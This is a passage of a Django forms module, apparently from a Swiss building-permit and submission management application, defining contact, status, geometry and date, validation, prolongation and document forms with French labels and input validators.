{str(file_size_mb)} Mo\"\n dynamic_help_text = \"\"\n global_allowed_file_extensions_list = (\n config.ALLOWED_FILE_EXTENSIONS.translate(\n str.maketrans(\"\", \"\", string.whitespace)\n )\n .lower()\n .split(\",\")\n )\n field_allowed_file_extensions_list = (\n field.allowed_file_types.translate(str.maketrans(\"\", \"\", string.whitespace))\n .lower()\n .split(\",\")\n )\n if field.allowed_file_types:\n extensions_intersect = list(\n set(global_allowed_file_extensions_list).intersection(\n 
set(field_allowed_file_extensions_list)\n )\n )\n dynamic_help_text = (\n f\"{default_help_text}, format(s): {field.allowed_file_types}\"\n )\n else:\n extensions_intersect = global_allowed_file_extensions_list\n dynamic_help_text = (\n f\"{default_help_text}, format(s): {config.ALLOWED_FILE_EXTENSIONS}\"\n )\n\n allowed_mimetypes_str = \", \".join(\n [mimetypes.types_map[f\".{item}\"] for item in extensions_intersect]\n )\n\n return {\n **default_kwargs,\n \"validators\": [services.validate_file],\n \"help_text\": dynamic_help_text,\n \"widget\": forms.ClearableFileInput(attrs={\"accept\": allowed_mimetypes_str}),\n }\n\n def get_list_single_field_kwargs(self, field, default_kwargs):\n choices = [(\"\", \"\")] + [(value, value) for value in field.choices.splitlines()]\n\n return {\n **default_kwargs,\n \"choices\": choices,\n \"widget\": Select2Widget() if len(choices) > 5 else forms.Select(),\n }\n\n def get_list_multiple_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"choices\": [(value, value) for value in field.choices.splitlines()],\n \"widget\": Select2MultipleWidget()\n if len(field.choices) > 5\n else forms.CheckboxSelectMultiple(),\n }\n\n def save(self):\n to_geocode_addresses = []\n for form, field in self.get_fields():\n if field.is_value_field():\n self.instance.set_field_value(\n form=form,\n field=field,\n value=self.cleaned_data[self.get_field_name(form, field)],\n )\n if (\n field.input_type == models.Field.INPUT_TYPE_ADDRESS\n and field.store_geometry_for_address_field\n and self.cleaned_data[self.get_field_name(form, field)]\n ):\n to_geocode_addresses.append(\n self.cleaned_data[self.get_field_name(form, field)]\n )\n self.instance.reverse_geocode_and_store_address_geometry(to_geocode_addresses)\n\n\nclass AppendicesForm(FieldsForm):\n prefix = \"appendices\"\n\n def get_fields_by_form(self):\n return self.instance.get_appendices_fields_by_form()\n\n def get_fields(self):\n for form, fields in self.instance.get_appendices_fields_by_form():\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n return self.instance.get_appendices_values()\n\n def get_field_kwargs(self, prop):\n return {\n **super().get_field_kwargs(prop),\n }\n\n\nclass SubmissionCreditorForm(forms.ModelForm):\n class Meta:\n model = models.Submission\n fields = [\"creditor_type\"]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n required_contact_forms = set(\n models.ContactForm.objects.filter(\n form_category__in=self.instance.get_form_categories()\n ).values_list(\"type\", flat=True)\n )\n\n choices = [\n (creditor_type, label)\n for creditor_type, label in self.fields[\"creditor_type\"].choices\n if creditor_type in required_contact_forms\n ]\n choices.insert(0, (\"\", \"----\"))\n self.fields[\"creditor_type\"].choices = choices\n\n\nclass SubmissionContactForm(forms.ModelForm):\n required_css_class = \"required\"\n contact_fields = [\n \"first_name\",\n \"last_name\",\n \"company_name\",\n \"vat_number\",\n \"address\",\n \"address\",\n \"city\",\n \"phone\",\n \"zipcode\",\n \"email\",\n ]\n\n first_name = forms.CharField(\n max_length=150,\n label=_(\"Prénom\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Marcel\",\n }\n ),\n )\n last_name = forms.CharField(\n max_length=100,\n label=_(\"Nom\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Dupond\",\n }\n ),\n )\n phone = forms.CharField(\n min_length=10,\n max_length=16,\n label=_(\"Téléphone\"),\n widget=forms.TextInput(\n attrs={\n 
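The accept-list computation above indexes mimetypes.types_map directly, which raises KeyError for any whitelisted extension the mimetypes module does not know. A sketch of the same whitespace-stripped intersection with a .get() guard:

import mimetypes
import string

def accept_attr(global_exts, field_exts):
    # Normalize "pdf, png" style config strings into lowercase extension lists.
    clean = lambda s: s.translate(str.maketrans("", "", string.whitespace)).lower().split(",")
    allowed = set(clean(global_exts)) & set(clean(field_exts)) if field_exts else set(clean(global_exts))
    # .get() skips extensions absent from types_map instead of raising.
    return ", ".join(sorted(filter(None, (mimetypes.types_map.get(f".{e}") for e in allowed))))

print(accept_attr("pdf, png, jpg", "png,jpg"))  # image/jpeg, image/png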
\"placeholder\": \"ex: 024 111 22 22\",\n }\n ),\n validators=[\n RegexValidator(\n regex=r\"^(((\\+41)\\s?)|(0))?(\\d{2})\\s?(\\d{3})\\s?(\\d{2})\\s?(\\d{2})$\",\n message=mark_safe(\n 'Veuillez saisir un numéro de téléphone suisse valide.'\n ),\n )\n ],\n )\n email = forms.EmailField(\n max_length=100,\n label=_(\"Email\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: exemple@exemple.com\",\n }\n ),\n )\n address = forms.CharField(\n max_length=100,\n label=_(\"Adresse\"),\n widget=AddressWidget(\n autocomplete_options={\n \"single_address_field\": False,\n \"single_contact\": False,\n },\n ),\n )\n\n zipcode = forms.IntegerField(\n label=_(\"NPA\"),\n validators=[MinValueValidator(1000), MaxValueValidator(9999)],\n widget=forms.NumberInput(),\n )\n city = forms.CharField(\n max_length=100,\n label=_(\"Ville\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Yverdon\",\n }\n ),\n )\n company_name = forms.CharField(\n required=False,\n label=_(\"Raison sociale\"),\n max_length=100,\n widget=forms.TextInput(attrs={\"placeholder\": \"ex: Construction SA\"}),\n )\n vat_number = forms.CharField(\n required=False,\n label=_(\"Numéro TVA\"),\n max_length=19,\n validators=[\n RegexValidator(\n regex=r\"^(CHE-)\\d{3}\\.\\d{3}\\.\\d{3}(\\sTVA)?$\",\n message=\"Le code d'entreprise doit être de type \\\n CHE-123.456.789 (TVA) \\\n et vous pouvez le trouver sur \\\n le registre fédéral des entreprises \\\n https://www.uid.admin.ch/search.aspx\",\n )\n ],\n widget=forms.TextInput(attrs={\"placeholder\": \"ex: CHE-123.456.789 (TVA)\"}),\n )\n contact_form = forms.ModelChoiceField(\n queryset=models.ContactType.objects.all(),\n empty_label=\"Sélectionner un contact...\",\n label=_(\"Type de contact\"),\n )\n\n class Meta:\n model = models.SubmissionContact\n fields = [\"contact_form\"]\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get(\"instance\")\n\n if instance and instance.pk:\n kwargs[\"initial\"] = {\n **kwargs.get(\"initial\", {}),\n **{\n **kwargs.get(\"initial\", {}),\n **{\n field: getattr(instance.contact, field)\n for field in self.contact_fields\n },\n **{\"actor_form\": instance.contact_form},\n },\n }\n\n super().__init__(*args, **kwargs)\n\n @transaction.atomic\n def save(self, submission, commit=True):\n contact = self.instance.contact if self.instance.pk else None\n\n if not contact:\n contact = models.Contact.objects.create(\n **{field: self.cleaned_data.get(field) for field in self.contact_fields}\n )\n else:\n for field in self.contact_fields:\n setattr(contact, field, self.cleaned_data.get(field))\n contact.save()\n\n instance = super().save(commit=False)\n instance.contact = contact\n instance.submission = submission\n instance.save()\n\n return instance\n\n\nclass SubmissionAdditionalInformationForm(forms.ModelForm):\n required_css_class = \"required\"\n\n notify_author = forms.BooleanField(\n label=_(\"Notifier l'auteur de la demande\"),\n required=False,\n )\n reason = forms.CharField(\n label=_(\"Raison\"),\n widget=forms.Textarea(attrs={\"rows\": 1}),\n required=False,\n help_text=_(\"(Optionnel) Raison du changement du statut de la demande\"),\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"is_public\",\n \"shortname\",\n \"status\",\n ]\n widgets = {\n \"is_public\": forms.RadioSelect(\n choices=PUBLIC_TYPE_CHOICES,\n ),\n }\n\n def __init__(self, user, *args, **kwargs):\n self.instance = kwargs.get(\"instance\", None)\n initial = {}\n for prop_value in self.get_values():\n initial[\n self.get_field_name(\n 
prop_value.form.form_id,\n prop_value.field_id,\n )\n ] = prop_value.value\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n super().__init__(*args, **kwargs)\n\n if self.instance:\n available_statuses_for_administrative_entity = list(\n models.SubmissionWorkflowStatus.objects.get_statuses_for_administrative_entity(\n self.instance.administrative_entity\n )\n )\n\n # Add STATUS_INQUIRY_IN_PROGRESS when any form of submission can be STATUS_INQUIRY_IN_PROGRESS\n permanent_publication_enabled = self.instance.forms.filter(\n permanent_publication_enabled=False\n ).exists()\n if not permanent_publication_enabled:\n STATUS_INQUIRY_IN_PROGRESS = (\n models.Submission.STATUS_INQUIRY_IN_PROGRESS\n )\n else:\n STATUS_INQUIRY_IN_PROGRESS = None\n\n # If an amend property in the submission can always be amended, some statuses are added to the list\n if permissions.can_always_be_updated(user, self.instance):\n filter1 = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(i in tup for i in models.Submission.AMENDABLE_STATUSES)\n or STATUS_INQUIRY_IN_PROGRESS in tup\n ]\n else:\n filter1 = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(i in tup for i in models.Submission.AMENDABLE_STATUSES)\n # Add curent status even if this one cannot be changed (otherwise the wrong status is selected in the disabled dropdown)\n or self.instance.status in tup or STATUS_INQUIRY_IN_PROGRESS in tup\n ]\n\n filter2 = [\n el\n for el in filter1\n if any(i in el for i in available_statuses_for_administrative_entity)\n ]\n\n self.fields[\"status\"].choices = tuple(filter2)\n # A permit that is approved, rejected or archived cannot have its status changed and author cannot be notified anymore\n if self.instance.status not in models.Submission.EDITABLE_STATUSES:\n self.fields[\"status\"].disabled = True\n self.fields[\"notify_author\"].disabled = True\n if permissions.can_always_be_updated(user, self.instance):\n all_statuses_tuple = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(\n i in tup\n for i in available_statuses_for_administrative_entity\n )\n ]\n\n self.fields[\"status\"].choices = tuple(all_statuses_tuple)\n\n # Don't notify anonymous user\n if self.instance.forms.filter(is_anonymous=True).exists():\n self.fields[\"notify_author\"].widget = forms.HiddenInput()\n self.fields[\"reason\"].widget = forms.HiddenInput()\n\n # A permit that is anonymous cannot be notified\n if self.instance.forms.filter(is_anonymous=True).exists():\n self.fields[\"notify_author\"].disabled = True\n\n if not config.ENABLE_GEOCALENDAR:\n self.fields[\"shortname\"].widget = forms.HiddenInput()\n self.fields[\"is_public\"].widget = forms.HiddenInput()\n\n # Only show permanent publication button if all forms have it set to True\n if (\n not self.instance.forms.filter(\n permanent_publication_enabled=True\n ).count()\n == self.instance.forms.count()\n ):\n self.fields[\"is_public\"].widget = forms.HiddenInput()\n\n for form, field in self.get_fields():\n field_name = self.get_field_name(form.id, field.id)\n\n self.fields[field_name] = forms.CharField(\n label=field.name,\n required=field.is_mandatory,\n help_text=field.help_text,\n widget=forms.Textarea(\n attrs={\n \"rows\": 3,\n \"placeholder\": field.placeholder,\n \"class\": \"amend-field-property\",\n }\n ),\n validators=[\n RegexValidator(\n regex=field.regex_pattern,\n message=get_regex_error_message(field),\n )\n ],\n )\n\n def get_field_name(self, form_id, field_id):\n return \"{}_{}\".format(form_id, field_id)\n\n def 
get_fields(self):\n \"\"\"\n Return a list of tuples `(Form, SubmissionAmendField)` for the\n amend fields of the current submission. Used to create the form fields.\n \"\"\"\n fields_by_form = self.instance.get_amend_custom_fields_by_form()\n for form, fields in fields_by_form:\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n \"\"\"\n Return a queryset of `SubmissionAmendFieldValue` for the custom properties\n on the current submission. They're used to set the initial value of the form\n fields.\n \"\"\"\n return self.instance.get_amend_custom_fields_values()\n\n def get_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for each form and their fields.\n \"\"\"\n\n return [\n (\n form,\n [\n (\n self[self.get_field_name(form.id, field.id)],\n field.is_visible_by_author,\n field.is_visible_by_validators,\n )\n for field in fields\n ],\n )\n for form, fields in self.instance.get_amend_custom_fields_by_form()\n ]\n\n def get_base_fields(self):\n \"\"\"\n Return a list of base fields for the current Model Form.\n \"\"\"\n return [self[field] for field in self.base_fields]\n\n def clean_status(self):\n status = self.cleaned_data.get(\"status\")\n\n if (\n self.instance.status == models.Submission.STATUS_INQUIRY_IN_PROGRESS\n and not status == models.Submission.STATUS_INQUIRY_IN_PROGRESS\n ):\n raise ValidationError(\n _(\n \"Vous ne pouvez pas changer le status de la demande car une enquête public est en cours\"\n )\n )\n\n return status\n\n def clean_notify_author(self):\n notify_author = self.cleaned_data.get(\"notify_author\")\n\n if (\n self.cleaned_data.get(\"status\")\n == models.Submission.STATUS_AWAITING_SUPPLEMENT\n and not notify_author\n ):\n raise ValidationError(\n _(\"Vous devez notifier l'auteur pour une demande de compléments\")\n )\n\n return notify_author\n\n def clean_reason(self):\n reason = self.cleaned_data.get(\"reason\")\n\n if (\n self.cleaned_data.get(\"status\")\n == models.Submission.STATUS_AWAITING_SUPPLEMENT\n and self.cleaned_data.get(\"notify_author\")\n and not reason\n ):\n raise ValidationError(\n _(\"Vous devez fournir une raison pour la demande de compléments\")\n )\n\n return reason\n\n def save(self, commit=True):\n submission = super().save(commit=False)\n for form, field in self.get_fields():\n self.instance.set_amend_custom_field_value(\n form=form,\n field=field,\n value=self.cleaned_data[self.get_field_name(form.id, field.id)],\n )\n if commit:\n if self.cleaned_data.get(\"notify_author\"):\n self._notify_author(submission)\n submission.save()\n return submission\n\n def _notify_author(self, submission):\n sender_name = (\n f\"{submission.administrative_entity.expeditor_name} \"\n if submission.administrative_entity.expeditor_name\n else \"\"\n )\n sender = (\n f\"{sender_name}<{submission.administrative_entity.expeditor_email}>\"\n if submission.administrative_entity.expeditor_email\n else settings.DEFAULT_FROM_EMAIL\n )\n\n if submission.status == models.Submission.STATUS_AWAITING_SUPPLEMENT:\n submission_url = submission.get_absolute_url(\n reverse(\n \"submissions:submission_fields\",\n kwargs={\"submission_id\": submission.pk},\n )\n )\n request_submission_edit_text = True\n else:\n submission_url = submission.get_absolute_url(\n reverse(\n \"submissions:submission_detail\",\n kwargs={\"submission_id\": submission.pk},\n )\n )\n request_submission_edit_text = False\n\n services.send_email(\n template=\"submission_changed.txt\",\n sender=sender,\n receivers=[submission.author.email],\n 
subject=\"{} ({})\".format(\n _(\"Votre demande/annonce a changé de statut\"),\n submission.get_forms_names_list(),\n ),\n context={\n \"status\": dict(submission.STATUS_CHOICES)[submission.status],\n \"reason\": (\n self.cleaned_data.get(\"reason\")\n if self.cleaned_data.get(\"reason\")\n else \"\"\n ),\n \"submission_url\": submission_url,\n \"administrative_entity\": submission.administrative_entity,\n \"name\": submission.author.get_full_name(),\n \"request_submission_edit_text\": request_submission_edit_text,\n },\n )\n\n\n# extend django gis osm openlayers widget\nclass GeometryWidget(geoforms.OSMWidget):\n template_name = \"geometrywidget/geometrywidget.html\"\n map_srid = 2056\n\n @property\n def media(self):\n return forms.Media(\n css={\n \"all\": (\n \"libs/js/openlayers6/ol.css\",\n \"customWidgets/RemoteAutocomplete/remoteautocomplete.css\",\n \"libs/js/jquery-ui-custom/jquery-ui.min.css\",\n \"css/geotime.css\",\n )\n },\n js=(\n \"libs/js/openlayers6/ol.js\",\n \"libs/js/proj4js/proj4-src.js\",\n \"customWidgets/GeometryWidget/geometrywidget.js\",\n \"libs/js/jquery-ui-custom/jquery-ui.min.js\",\n ),\n )\n\n\nclass SubmissionGeoTimeForm(forms.ModelForm):\n required_css_class = \"required\"\n starts_at = forms.DateTimeField(\n label=_(\"Date de début\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n },\n attrs={\"autocomplete\": \"off\"},\n ).start_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la date de début à l'aide de l'outil mis à disposition\",\n )\n ends_at = forms.DateTimeField(\n label=_(\"Date de fin\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n },\n attrs={\"autocomplete\": \"off\"},\n ).end_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la date de fin à l'aide de l'outil mis à disposition\",\n )\n\n class Meta:\n\n model = models.SubmissionGeoTime\n fields = [\n \"geom\",\n \"starts_at\",\n \"ends_at\",\n \"comment\",\n \"external_link\",\n ]\n help_texts = {\n \"starts_at\": \"Date de début du chantier ou d'occupation du territoire. Si l'heure n'est pas pertinente, insérer 00:00.\",\n \"ends_at\": \"Date de fin du chantier ou d'occupation du territoire. 
Si l'heure n'est pas pertinente, insérer 23:59.\",\n }\n widgets = {\n \"geom\": GeometryWidget(),\n \"comment\": forms.Textarea(attrs={\"rows\": 2}),\n }\n\n def __init__(self, *args, **kwargs):\n self.submission = kwargs.pop(\"submission\", None)\n disable_fields = kwargs.pop(\"disable_fields\", False)\n initial = {}\n if (\n self.submission.prolongation_date\n and self.submission.prolongation_status\n == self.submission.PROLONGATION_STATUS_APPROVED\n ):\n initial[\"ends_at\"] = self.submission.prolongation_date\n\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n\n super().__init__(*args, **kwargs)\n\n required_info = self.submission.get_geotime_required_info()\n\n if (\n models.GeoTimeInfo.DATE not in required_info\n or self.instance.comes_from_automatic_geocoding\n ):\n del self.fields[\"starts_at\"]\n del self.fields[\"ends_at\"]\n if (\n models.GeoTimeInfo.GEOMETRY not in required_info\n and not self.instance.comes_from_automatic_geocoding\n ):\n del self.fields[\"geom\"]\n\n else:\n options = self.get_widget_options(self.submission)\n if options[\"geo_widget_option\"][0] == 2:\n self.fields[\"geom\"].widget = GeometryWidgetAdvanced()\n self.fields[\"geom\"].widget.attrs[\"options\"] = options\n self.fields[\"geom\"].widget.attrs[\"options\"][\n \"edit_geom\"\n ] = not disable_fields\n if (\n not config.ENABLE_GEOCALENDAR\n or self.instance.comes_from_automatic_geocoding\n or (\n (models.GeoTimeInfo.GEOMETRY and models.GeoTimeInfo.DATE)\n not in required_info\n )\n ):\n del self.fields[\"comment\"]\n del self.fields[\"external_link\"]\n if disable_fields:\n for field in self.fields.values():\n field.disabled = True\n\n min_start_date = self.submission.get_min_starts_at()\n if self.fields.get(\"starts_at\"):\n # starts_at >= min_start_date\n self.fields[\"starts_at\"].widget.config[\"options\"].update(\n {\"minDate\": min_start_date.strftime(\"%Y/%m/%d\")}\n )\n # ends_at >= starts_at\n self.fields[\"ends_at\"].widget.config[\"options\"].update(\n {\"minDate\": min_start_date.strftime(\"%Y/%m/%d\")}\n )\n\n def get_widget_options(self, submission):\n forms = submission.forms.order_by(\"-wms_layers_order\") if submission else []\n\n wms_layers = [\n form.wms_layers.strip() for form in forms if form.wms_layers != \"\"\n ]\n\n forms_set = {form for form in forms}\n has_geom = any(form.has_geometry for form in forms_set)\n has_geom_point = any(form.has_geometry_point for form in forms_set)\n has_geom_line = any(form.has_geometry_line for form in forms_set)\n has_geom_polygon = any(form.has_geometry_polygon for form in forms_set)\n\n map_widget_configuration = [\n form.map_widget_configuration.configuration\n for form in forms\n if form.map_widget_configuration != None\n ]\n\n geo_widget_option = [\n form.geo_widget_option for form in forms if form.geo_widget_option != None\n ]\n\n ftsearch_additional_searchtext_for_address_field = (\n submission.administrative_entity.additional_searchtext_for_address_field\n if submission\n else \"\"\n )\n options = {\n \"administrative_entity_url\": reverse(\n \"submissions:administrative_entities_geojson\",\n kwargs={\n \"administrative_entity_id\": submission.administrative_entity_id\n },\n )\n if submission\n else None,\n \"administrative_entity_id\": submission.administrative_entity_id\n if submission\n else None,\n \"wms_layers\": wms_layers,\n \"map_width\": \"100%\",\n \"map_height\": 400,\n \"default_center\": [2539057, 1181111],\n \"map_widget_configuration\": map_widget_configuration,\n \"geo_widget_option\": 
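SubmissionGeoTimeForm.__init__ above prunes the fields it does not need; deleting from self.fields removes a field from both rendering and validation. A minimal sketch of the idiom:

from django import forms

class GeoTimeSketch(forms.Form):
    starts_at = forms.DateTimeField()
    ends_at = forms.DateTimeField()
    comment = forms.CharField(required=False)

    def __init__(self, *args, needs_dates=True, **kwargs):
        super().__init__(*args, **kwargs)
        if not needs_dates:
            # Removed fields neither render nor participate in clean().
            del self.fields["starts_at"]
            del self.fields["ends_at"]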
geo_widget_option,\n \"default_zoom\": 10,\n \"display_raw\": False,\n \"edit_geom\": has_geom,\n \"edit_point\": has_geom_point,\n \"edit_line\": has_geom_line,\n \"edit_polygon\": has_geom_polygon,\n \"min_zoom\": 5,\n \"wmts_capabilities_url\": settings.WMTS_GETCAP,\n \"wmts_layer\": settings.WMTS_LAYER,\n \"wmts_capabilities_url_alternative\": settings.WMTS_GETCAP_ALTERNATIVE,\n \"wmts_layer_alternative\": settings.WMTS_LAYER_ALTERNATIVE,\n \"restriction_area_enabled\": True,\n \"geometry_db_type\": \"GeometryCollection\",\n \"ftsearch_additional_searchtext_for_address_field\": ftsearch_additional_searchtext_for_address_field,\n \"ftsearch_apiurl\": settings.LOCATIONS_SEARCH_API,\n \"ftsearch_apiurl_detail\": settings.LOCATIONS_SEARCH_API_DETAILS,\n \"ftsearch_apiurl_origins\": \"address,parcel\",\n }\n\n return options\n\n def clean(self):\n cleaned_data = super().clean()\n starts_at = cleaned_data.get(\"starts_at\")\n ends_at = cleaned_data.get(\"ends_at\")\n if starts_at and ends_at:\n if ends_at <= starts_at:\n raise ValidationError(\n _(\"La date de fin doit être postérieure à la date de début.\")\n )\n\n min_starts_at = self.submission.get_min_starts_at()\n # add two hours of tolerance in the validation\n if starts_at <= min_starts_at - timedelta(hours=2):\n raise ValidationError(\n {\n \"starts_at\": _(\n \"La date de début doit être postérieure à %(date)s\"\n )\n % {\"date\": min_starts_at.strftime(\"%d.%m.%Y %H:%M\")}\n }\n )\n\n if self.submission.max_validity is not None:\n max_ends_at = starts_at + timedelta(days=self.submission.max_validity)\n if ends_at > max_ends_at + timedelta(hours=2):\n raise ValidationError(\n {\n \"ends_at\": _(\n \"La date de fin doit être au maximum: %(date)s\"\n )\n % {\"date\": max_ends_at.strftime(\"%d.%m.%Y %H:%M\")}\n }\n )\n\n def save(self, commit=True):\n instance = super().save(commit=False)\n instance.submission = self.submission\n\n if commit:\n instance.save()\n\n return instance\n\n\nclass ModelMultipleChoiceFieldWithShortname(forms.ModelMultipleChoiceField):\n \"\"\"\n Override label_from_instance to use shortname of object\n instead of __str__ method from object\n \"\"\"\n\n def label_from_instance(self, obj):\n return obj.shortname if obj.shortname else obj\n\n\nclass SubmissionValidationDepartmentSelectionForm(forms.Form):\n departments = ModelMultipleChoiceFieldWithShortname(\n queryset=PermitDepartment.objects.none(),\n widget=forms.CheckboxSelectMultiple(),\n label=_(\"Services chargés de la validation\"),\n )\n\n def __init__(self, instance, *args, **kwargs):\n self.submission = instance\n permit_request_ct = ContentType.objects.get_for_model(models.Submission)\n validate_permission = Permission.objects.get(\n codename=\"validate_submission\", content_type=permit_request_ct\n )\n submission_departments = PermitDepartment.objects.filter(\n administrative_entity=self.submission.administrative_entity,\n group__permissions=validate_permission,\n ).distinct()\n departments = []\n for validation in self.submission.validations.all():\n departments.append(validation.department)\n kwargs[\"initial\"] = dict(\n kwargs.get(\"initial\", {}),\n departments=departments\n if departments\n else submission_departments.filter(is_default_validator=True),\n )\n\n super().__init__(*args, **kwargs)\n self.fields[\"departments\"].queryset = submission_departments\n\n\nclass SubmissionValidationForm(forms.ModelForm):\n def __init__(self, user, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if not 
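The clean() method above accepts start dates slightly before the minimum thanks to a two-hour grace window. A self-contained restatement of that tolerance check:

from datetime import datetime, timedelta

def starts_too_early(starts_at, min_starts_at, tolerance=timedelta(hours=2)):
    # Mirrors the form's comparison: only starts more than `tolerance`
    # before the minimum are rejected.
    return starts_at <= min_starts_at - tolerance

min_start = datetime(2024, 1, 1, 12, 0)
assert not starts_too_early(datetime(2024, 1, 1, 11, 0), min_start)  # within grace
assert starts_too_early(datetime(2024, 1, 1, 9, 0), min_start)       # too early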
permissions.has_permission_to_edit_submission_validations(\n user, submission\n ):\n self.fields[\"comment_is_visible_by_author\"].disabled = True\n\n self.fields[\"validation_status\"].choices = [\n (\n value,\n label,\n )\n for value, label in self.fields[\"validation_status\"].choices\n ]\n\n class Meta:\n model = models.SubmissionValidation\n fields = [\n \"validation_status\",\n \"comment\",\n \"comment_is_visible_by_author\",\n ]\n widgets = {\n \"validation_status\": forms.RadioSelect(),\n \"comment\": forms.Textarea(attrs={\"rows\": 3}),\n \"comment_is_visible_by_author\": forms.CheckboxInput(),\n }\n\n\nclass SubmissionValidationPokeForm(forms.Form):\n def __init__(self, instance, request, *args, **kwargs):\n self.submission = instance\n self.request = request\n\n super().__init__(*args, **kwargs)\n\n def save(self):\n return services.send_validation_reminder(\n self.submission, absolute_uri_func=self.request.build_absolute_uri\n )\n\n\nclass SubmissionProlongationForm(forms.ModelForm):\n prolongation_date = forms.DateTimeField(\n label=_(\"Nouvelle date de fin demandée\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n \"minDate\": (datetime.today()).strftime(\"%Y/%m/%d\"),\n }\n ).start_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la nouvelle date de fin planifiée\",\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"prolongation_date\",\n \"prolongation_comment\",\n \"prolongation_status\",\n ]\n widgets = {\n \"prolongation_comment\": forms.Textarea(attrs={\"rows\": 3}),\n }\n\n def clean(self):\n cleaned_data = super().clean()\n prolongation_date = cleaned_data.get(\"prolongation_date\")\n original_end_date = self.instance.get_geotime_objects().aggregate(\n Max(\"ends_at\")\n )[\"ends_at__max\"]\n\n if prolongation_date:\n if prolongation_date <= original_end_date:\n raise forms.ValidationError(\n _(\n \"La date de prolongation doit être postérieure à la date originale de fin (%s).\"\n )\n % original_end_date.strftime(settings.DATETIME_INPUT_FORMAT)\n )\n\n\nclass SubmissionClassifyForm(forms.ModelForm):\n required_css_class = \"required\"\n\n # Status field is set as initial value when instantiating the form in the view\n status = forms.ChoiceField(\n choices=(\n (status, label)\n for status, label in models.Submission.STATUS_CHOICES\n if status\n in [\n models.Submission.STATUS_APPROVED,\n models.Submission.STATUS_REJECTED,\n ]\n ),\n widget=forms.HiddenInput,\n disabled=True,\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"status\",\n \"validation_pdf\",\n \"additional_decision_information\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if not self.instance.is_validation_document_required():\n del self.fields[\"validation_pdf\"]\n\n def save(self, commit=True):\n submission = super().save(commit=False)\n\n # ModelForm doesn't set the status because the field is disabled, so let's do it manually\n if self.cleaned_data[\"status\"]:\n submission.status = self.cleaned_data[\"status\"]\n\n submission.validated_at = timezone.now()\n\n if commit:\n submission.save()\n\n return submission\n\n\nclass SubmissionComplementaryDocumentsForm(forms.ModelForm):\n authorised_departments = forms.ModelMultipleChoiceField(\n queryset=None,\n widget=forms.CheckboxSelectMultiple,\n required=False,\n )\n generate_from_model = forms.ChoiceField(\n # choices=[], # 
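In SubmissionProlongationForm.clean() above, the original end date comes from aggregate(), which returns a dict keyed "<field>__max" and yields None on an empty queryset; the comparison that follows assumes at least one geotime row exists. A sketch of a guarded lookup:

from django.db.models import Max

def latest_end(geotime_qs):
    # None signals "no geotime rows yet"; callers should skip the date
    # comparison in that case rather than compare against None.
    return geotime_qs.aggregate(Max("ends_at"))["ends_at__max"]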
dynamically populated in __init__\n required=False,\n label=_(\"Générer à partir du modèle\"),\n )\n\n class Meta:\n model = models.SubmissionComplementaryDocument\n fields = [\n \"generate_from_model\",\n \"document\",\n \"description\",\n \"status\",\n \"authorised_departments\",\n \"document_type\",\n ]\n widgets = {\n \"description\": forms.Textarea(attrs={\"rows\": 2}),\n }\n\n def __init__(self, request, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.request = request\n self.submission = submission\n self.fields[\n \"authorised_departments\"\n ].queryset = PermitDepartment.objects.filter(\n administrative_entity=submission.administrative_entity\n ).all()\n self.fields[\"authorised_departments\"].label = _(\"Département autorisé\")\n\n # TOFIX: reports that are linked to transaction should not\n # be able to be generated here but rather through the transactions' tab\n # For now, we have to get the last transaction, in order for the reports\n # linked payments to work.\n last_transaction = self.submission.get_last_transaction()\n\n # TODO: prefetch (to optimize reduce requests count)\n choices = [(\"\", _(\"Aucune sélection\"))]\n for form in self.submission.forms.all():\n subchoices = []\n parent_doc_types = form.document_types.all()\n for parent_doc_type in parent_doc_types:\n doc_types = parent_doc_type.children.all()\n for doc_type in doc_types:\n for report in doc_type.reports.filter(is_visible=True):\n if last_transaction is not None:\n subchoices.append(\n (\n f\"{form.pk}/{report.pk}/{doc_type.pk}/{last_transaction.pk}\",\n f\"{report} / {doc_type}\",\n )\n )\n else:\n subchoices.append(\n (\n f\"{form.pk}/{report.pk}/{doc_type.pk}/0\",\n f\"{report} / {doc_type}\",\n )\n )\n if subchoices:\n choices.append((f\"{form}\", subchoices))\n self.fields[\"generate_from_model\"].choices = choices\n\n parent_types = models.ComplementaryDocumentType.objects.filter(\n form__in=submission.forms.all()\n ).all()\n\n self.fields[\"document_type\"].queryset = parent_types\n\n # Document, document type are not required, as user can also use a generated report\n self.fields[\"document_type\"].required = False\n self.fields[\"document\"].required = False\n\n for parent in parent_types:\n name = \"parent_{}\".format(parent.pk)\n self.fields[name] = forms.ModelChoiceField(\n queryset=models.ComplementaryDocumentType.objects.filter(\n form=None, 